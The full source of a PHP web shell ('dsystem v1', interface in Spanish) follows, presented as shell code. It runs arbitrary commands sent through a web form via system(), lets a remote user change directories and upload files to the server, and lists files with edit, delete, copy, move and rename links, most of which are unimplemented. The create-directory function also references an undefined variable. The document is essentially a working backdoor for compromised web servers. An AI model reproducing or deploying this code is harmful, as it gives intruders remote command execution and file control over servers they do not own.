Shell Code

<html>
<head>
<title>
shell dsystem v1 http://dsystem.es
</title>
</head>
<body>
<style type="text/css">
body
{
background-color:#000000;
color:#FFFFFF;
font-family:Terminus,TTFminus,Fixedsys,Fixed,Terminal,C ourier New,Courier;
font-size:12px;
margin:30px;
}

table {
font-size: 11px;
}
</style>
<?
error_reporting (0);
set_time_limit (0);
if (empty($_GET ['cmd'])){
/* funcion para cmd*/
$dir = getcwd ();
}
else {
$dir = $_GET ['cmd'];
}
chdir ($dir);
$phpself = $_SERVER ['PHP_SELF'] . "?cmd=" . $dir;

echo "<font size='20px'><center><font color=red>D</font>SHELLv1</center></font><br>\n";
echo "Directorio: " . getcwd () . "<br>\n";
echo "<pre>\n\n\n</pre>";

echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = '".$phpself."&funcion=comando'>CMD comando</a></td>\n";
echo "<td><a href = '".$phpself."&funcion=crear'>Crear Directorio</a></td>\n";
echo "<td><a href = '".$phpself."&funcion=upload'>Upload</a></td>\n";
echo "</tr></table>";
echo "<pre>\n\n</pre>";

function cmd_comando()
{
global $phpself ;
$cmd = $_POST ['cmd'];
if (empty ($cmd)){
echo "<form action = '".$phpself . "&funcion=comando' method ='POST'>\n";
echo "Shell Comando: <input name = 'cmd'>\n";
echo "<input type = 'submit' value = 'Executar'></form><p>\n";
}
else {
system ($cmd);
} }

function crear()
{
global $phpself;

$nuevo = $_POST ['new'];
if (empty ($nuevo)){
echo "<form action = '".$phpself . "&funcion=crear' method = 'POST'>\n";
echo "<tr><td>Directorio: <input name = 'new'></td>\n";
echo "<td><input type = 'submit' value = 'Crear'></td></tr></form>\n<p>";
}
else {
if ($fp = fopen ($new, "w")){
echo "Creado con Exito.<p>\n";
}
else {
echo "Imposible crear ".$file.".<p>\n";
}
fclose ($fp);
}
}
function upload()
{
global $phpself;

$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (empty ($file)){
echo "<form action = '".$phpself . "&funcion=upload' method = 'POST' ENCTYPE='multipart/form-data' >\n";
echo "Examinar: <input type = 'file' name = 'upload_file'>\n";
echo "<input type = 'submit' value = 'Upload'>\n";
echo "</form>\n<pre>\n\n</pre>";
}

else {
if(move_uploaded_file($temp,$file)){
echo "Archivo Cargado con Exito.<p>\n";
unlink ($temp);
}
else {
echo "Imposible subir" . $file . ".<p>\n";
}
} }
$mode = $_GET ['funcion'];
switch ($mode){

case 'comando': cmd_comando();
break;
case 'crear': crear();
break;
case 'upload': upload();
break;
}

clearstatcache ();

echo "<pre>\n\n</pre>";
echo "<table width = 100% border='0' style='border:dashed 1px #FF0000;'>\n";
$files = scandir($dir);
foreach ($files as $file){
if (is_file ($file)){
/* peso kb*/
$size = round (filesize ($file) / 1024, 2);
echo "<tr><td><font color=red>+</font> ".$file."</td>";
echo "<td>".$size." KB</td>";
echo "<td><a href = ".$phpself . "&funcion=editar&archivo=".$file.">Editar</a></td>\n";
echo "<td><a href = ".$phpself . "&funcion=borrar&archivo=".$file.">Borrar</a></td>\n";
echo "<td><a href = ".$phpself . "&funcion=copiar&archivo=".$file.">Copiar</a></td>\n";
echo "<td><a href = ".$phpself . "&funcion=mover&src=".$file.">Mover</a></td>\n";
echo "<td><a href = ".$phpself . "&funcion=renombrar&old=".$file.">Renombrar</a></td></tr>\n";

}
}
print "<i>Servidor: " . $_SERVER ['SERVER_NAME'] . "</li><br>\n";

echo "</table>\n";
?>
</body>
</html>